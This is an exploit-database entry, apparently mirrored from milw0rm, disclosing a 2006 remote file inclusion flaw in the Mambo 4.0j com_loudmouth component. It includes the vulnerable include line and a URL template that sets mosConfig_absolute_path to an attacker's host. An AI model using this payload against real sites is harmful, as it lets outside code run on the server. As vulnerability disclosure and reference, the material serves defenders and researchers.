header-logo
Suggest Exploit
vendor:
Mambo
by:
h4ntu
7,5
CVSS
HIGH
Remote Inclusion Vulnerability
94
CWE
Product Name: Mambo
Affected Version From: 4.0j
Affected Version To: 4.0j
Patch Exists: YES
Related CWE: N/A
CPE: a:mambo:mambo:4.0j
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Another Mambo Component Remote Inclusion Vulnerability

A remote inclusion vulnerability was found in the file abbc.class.php of the Mambo component. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious value for the 'mosConfig_absolute_path' parameter.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion.
Source

Exploit-DB raw data:

Bug Found by h4ntu [http://h4ntu.com]  #batamhacker crew
Another Mambo component remote inclusion vulneribility
 
download : http://mamboxchange.com/frs/download.php/7911/com_loudmouth-4.0j.zip

bug found in file abbc.class.php :

include( $GLOBALS['mosConfig_absolute_path'].'/components/com_loudmouth/includes/abbc/abbc.config.php');

http://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker]
 
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink

# milw0rm.com [2006-07-17]